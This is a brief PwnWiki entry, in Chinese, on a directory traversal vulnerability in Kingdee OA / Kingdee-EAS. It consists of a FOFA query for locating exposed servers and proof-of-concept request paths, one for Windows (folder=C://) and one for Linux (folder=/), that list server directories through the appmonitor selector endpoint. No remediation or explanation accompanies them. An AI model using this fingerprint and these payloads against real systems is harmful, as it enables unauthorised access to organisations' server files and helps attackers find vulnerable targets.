金蝶OA server file 目錄遍歷漏洞

From PwnWiki
Other languages:

漏洞影響

金蝶OA

FOFA

app="Kingdee-EAS"

POC

Windows

appmonitor/protected/selector/server_file/files?folder=C://&suffix=

Linux

appmonitor/protected/selector/server_file/files?folder=/&suffix=